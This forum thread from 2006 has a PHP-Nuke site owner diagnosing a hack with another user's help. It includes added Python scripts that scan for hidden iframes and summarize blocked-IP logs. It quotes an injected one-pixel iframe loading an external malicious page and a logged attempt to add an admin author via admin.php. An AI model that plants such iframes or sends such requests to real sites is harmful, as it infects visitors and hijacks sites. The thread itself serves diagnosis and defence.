checksum

Joined: Jun 30, 2003
Posts: 39
Posted: Mon Jun 12, 2006 3:46 pm
Hi,
Something weird happened to my site today, looks like I was hacked.
There is this script prompt that comes up everytime you try to access the site:
http://www.xxxxxx.com/
I don't know what kind of script it is and where it comes from or what is causing it, I found this in my config.php file:
Code:
<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>
And there is another file that I deleted on the server root directory that was not familiar to me.
I deleted it, but it is still happening.
You do not see the script prompt on Firefox, only on IE.
I am running 7.6 and have the Sentinel.
Last edited by checksum on Mon Jun 12, 2006 6:09 pm; edited 1 time in total
hitwalker
Posts: 5661
Posted: Mon Jun 12, 2006 3:55 pm
Yes indeed, it nearly trashes the browser...
But I see you have Coppermine?
Can you disable that?
hitwalker

Posted: Mon Jun 12, 2006 3:57 pm
BTW... I still find the same hack code on your index...
hitwalker

Posted: Mon Jun 12, 2006 4:00 pm
The frame with code is between your chat block and donations block.
checksum

Posted: Mon Jun 12, 2006 4:24 pm
I uploaded a clean version of index.php, mainfile.php and config.php, but it was still happening...
I just renamed the chat folder. Can you check if it is still there?
hitwalker

Posted: Mon Jun 12, 2006 4:26 pm
It's gone now...
Refresh your browser and delete history.
checksum

Posted: Mon Jun 12, 2006 4:37 pm
hitwalker

Posted: Mon Jun 12, 2006 4:38 pm
YW
checksum

Posted: Mon Jun 12, 2006 4:45 pm
I still do not know how he put that iframe in my config.php.
Quote:
the frame with code is between your chat block and donations block.

How did you figure this out?
hitwalker

Posted: Mon Jun 12, 2006 4:50 pm
Well, it's not that easy figuring out how these idiots did that...
You should realise that there are many addons for Nuke that are vulnerable, and that goes for chats and galleries...
If you have addons running giving certain rights to the outside, you can get hacked in many ways...
How they did it isn't that important anymore...
Make sure you close every hole...
And how I found it was easy...
just by looking at your source.
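The check hitwalker describes, reading the served source for the injected tag, can be done across the whole web root rather than one page at a time. The script below is an added example, not code from this thread or from PHP-Nuke: it walks a directory tree and reports every iframe that is sized to a pixel or two or hidden with inline CSS, which is the shape of the tag that turned up in config.php above. The sample files it writes into a temporary directory are constructed for the demo (the first one reuses the tag posted in the thread); the list of file extensions and the 2 px size threshold are assumptions.

```python
import re
import tempfile
from pathlib import Path

# Matches an opening <iframe ...> tag, and the attributes inside it (quoted or bare values).
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

# Anything this many pixels or smaller counts as invisible (assumed threshold).
MAX_HIDDEN_PX = 2

# Constructed sample files. The tag in SAMPLE_CONFIG is the one posted in the thread;
# the iframe in SAMPLE_CLEAN is a benign, visible embed and must not be reported.
SAMPLE_CONFIG = """<?php
$dbhost = "localhost";
?>
<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>
"""
SAMPLE_CLEAN = '<html><body><iframe width="600" height="400" src="/chat/"></iframe></body></html>\n'
SAMPLE_CSS_HIDDEN = "<div><IFRAME SRC=http://example.invalid/x.php STYLE='display: none'></IFRAME></div>\n"


def parse_attrs(tag):
    """Return a lower-cased {name: value} dict for one opening tag."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        name, dq, sq, bare = m.groups()
        attrs[name.lower()] = dq if dq is not None else (sq if sq is not None else bare)
    return attrs


def _px(value):
    try:
        return float(re.sub(r"px$", "", value.strip(), flags=re.IGNORECASE))
    except ValueError:
        return None


def is_hidden(attrs):
    """True if the iframe is sized to (almost) nothing or hidden with inline CSS."""
    w, h = _px(attrs.get("width", "")), _px(attrs.get("height", ""))
    tiny = w is not None and h is not None and w <= MAX_HIDDEN_PX and h <= MAX_HIDDEN_PX
    style = re.sub(r"\s+", "", attrs.get("style", "")).lower()
    css_hidden = "display:none" in style or "visibility:hidden" in style
    return tiny or css_hidden


def find_hidden_iframes(text):
    """Return [{'line', 'src', 'tag'}] for every hidden iframe in one file's text."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(0))
        if is_hidden(attrs):
            line = text.count("\n", 0, m.start()) + 1
            hits.append({"line": line, "src": attrs.get("src", ""), "tag": m.group(0)})
    return hits


def scan_tree(root, exts=(".php", ".html", ".htm", ".tpl", ".js")):
    """Walk a web root and report hidden iframes file by file (extension list is an assumption)."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in exts:
            text = path.read_text(encoding="utf-8", errors="replace")
            for hit in find_hidden_iframes(text):
                findings.append({"file": path.relative_to(root).as_posix(), **hit})
    return findings


def demo():
    """Write the constructed samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "config.php").write_text(SAMPLE_CONFIG)
        (root / "index.html").write_text(SAMPLE_CLEAN)
        (root / "modules").mkdir()
        (root / "modules" / "chat.php").write_text(SAMPLE_CSS_HIDDEN)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}:{f['line']}  src={f['src']}")
```

Run it against the real document root instead of the temp directory by calling `scan_tree("/path/to/htdocs")`. Because config.php is PHP, the injected tag only shows up in served HTML if it sits outside the `<?php ... ?>` block, which is why scanning the files on disk catches it even when the page has been cleaned up in the browser cache.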
checksum

Posted: Mon Jun 12, 2006 6:08 pm
I deleted the chat folder (it is from the FlashChat addon module). I posted the hack in their forum.
I also keep getting this message every day now; every time Sentinel blocks the IP, he changes to a new one:
Code:
Date & Time: 2006-06-12 18:23:38 CDT GMT -0500
Blocked IP: 196.206.99.*
User ID: Anonymous (1)
Reason: Abuse-Author
--------------------
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Query String: www.xxxxxx.com/admin.php?op=AddAuthor&add_aid=tigersha
Get String: www.xxxxxx.com/admin.php?op=AddAuthor&add_aid=tigersha
Post String: www.xxxxxx.com/admin.php
Forwarded For: none
Client IP: none
Remote Address: 196.206.99.90
Remote Port: 52254
Request Method: GET
--------------------
Who-Is for IP
OrgName: African Network Information Center
OrgID: AFRINIC
Address: 03B3 - 3rd Floor - Ebene Cyber Tower
Address: Cyber City
Address: Ebene
Address: Mauritius
City: Ebene
StateProv:
PostalCode: 0001
Country: MU
NetRange: 196.0.0.0 - 196.255.255.255
CIDR: 196.0.0.0/8
NetName: NET196
NetHandle: NET-196-0-0-0-0
Parent:
NetType: Allocated to AfriNIC
NameServer: NS1.AFRINIC.NET
NameServer: NS-SEC.RIPE.NET
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
Comment:
RegDate: 1993-05-01
Updated: 2006-04-27
OrgAbuseHandle: GENER11-ARIN
OrgAbuseName: Generic POC
OrgAbusePhone: +230 4666616
OrgAbuseEmail: abusepoc@afrinic.net
OrgTechHandle: GENER11-ARIN
OrgTechName: Generic POC
OrgTechPhone: +230 4666616
OrgTechEmail: abusepoc@afrinic.net
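The notices Sentinel sends arrive one per block, and as the post says, the source address moves each time. Below is an added example, not part of the original post and not NukeSentinel's own code: a parser for the notice format quoted above that splits a mail body into records, pulls the `op` out of the logged admin.php query string, and counts attempts per /24 so an attacker rotating through one provider's range shows up as a single network instead of a stream of unrelated addresses. The first record in the sample is the one posted in the thread; the other two are constructed, and the /24 grouping is an assumption you can change with the `prefix` argument.

```python
import ipaddress
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample mail body: the first record is the one posted in the thread;
# the other two are made up to show the same op arriving from other addresses.
SAMPLE_LOG = """\
Date & Time: 2006-06-12 18:23:38 CDT GMT -0500
Blocked IP: 196.206.99.*
User ID: Anonymous (1)
Reason: Abuse-Author
--------------------
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Query String: www.xxxxxx.com/admin.php?op=AddAuthor&add_aid=tigersha
Get String: www.xxxxxx.com/admin.php?op=AddAuthor&add_aid=tigersha
Post String: www.xxxxxx.com/admin.php
Forwarded For: none
Client IP: none
Remote Address: 196.206.99.90
Remote Port: 52254
Request Method: GET
--------------------
Who-Is for IP
OrgName: African Network Information Center
NetRange: 196.0.0.0 - 196.255.255.255
Date & Time: 2006-06-13 02:10:05 CDT GMT -0500
Blocked IP: 196.206.99.*
User ID: Anonymous (1)
Reason: Abuse-Author
--------------------
Query String: www.xxxxxx.com/admin.php?op=AddAuthor&add_aid=tigersha
Remote Address: 196.206.99.131
Request Method: GET
--------------------
Who-Is for IP
OrgName: African Network Information Center
Date & Time: 2006-06-13 09:41:52 CDT GMT -0500
Blocked IP: 196.206.100.*
User ID: Anonymous (1)
Reason: Abuse-Author
--------------------
Query String: www.xxxxxx.com/admin.php?op=AddAuthor&add_aid=tigersha
Remote Address: 196.206.100.5
Request Method: GET
--------------------
Who-Is for IP
OrgName: African Network Information Center
"""

# Each notice starts with its Date & Time line; split on that without consuming it.
RECORD_START = re.compile(r"^(?=Date & Time:)", re.MULTILINE)


def parse_record(text):
    """Parse one notice's 'Key: value' header lines; the Who-Is section is ignored."""
    rec = {}
    for line in text.splitlines():
        if line.startswith("Who-Is for IP"):
            break
        key, sep, value = line.partition(": ")
        if sep:
            rec[key.strip()] = value.strip()
    return rec


def parse_log(text):
    """Split a mail body holding several notices into a list of record dicts."""
    return [parse_record(chunk) for chunk in RECORD_START.split(text) if chunk.strip()]


def admin_op(query_string):
    """('admin.php', 'AddAuthor') from 'host/admin.php?op=AddAuthor&add_aid=...'."""
    path, _, qs = query_string.partition("?")
    script = path.rsplit("/", 1)[-1]
    op = parse_qs(qs).get("op", [""])[0]
    return script, op


def source_ip(rec):
    # Use the socket address: Sentinel's 'Blocked IP' field is already masked to x.x.x.*
    return ipaddress.ip_address(rec["Remote Address"])


def summarize(records, prefix=24):
    """Count notices per (script, op, network) so hosts rotating inside one range add up."""
    counts = Counter()
    for rec in records:
        script, op = admin_op(rec.get("Query String", ""))
        net = ipaddress.ip_network(f"{source_ip(rec)}/{prefix}", strict=False)
        counts[(script, op, str(net))] += 1
    return counts


def blocklist(records, prefix=24):
    """Collapse the offending /prefix networks into the smallest sorted set of ranges."""
    nets = {ipaddress.ip_network(f"{source_ip(r)}/{prefix}", strict=False) for r in records}
    return [str(n) for n in sorted(ipaddress.collapse_addresses(nets))]


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for (script, op, net), n in summarize(recs).most_common():
        print(f"{n:3d}  {script} op={op}  from {net}")
    print("block:", ", ".join(blocklist(recs)))
```

Feed it the saved notice mails concatenated into one file. Widening `prefix` to 16 turns the two /24s in the sample into one 196.206.0.0/16 entry, which is the trade-off to weigh before putting a range into a firewall or .htaccess deny list: broader entries stop the rotation, but also lock out everyone else in that allocation.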
hitwalker

Posted: Mon Jun 12, 2006 6:11 pm
Yeah well, welcome to the club...
They try, get blocked, they try, get blocked...
It's like a game... they continue... mostly by remote...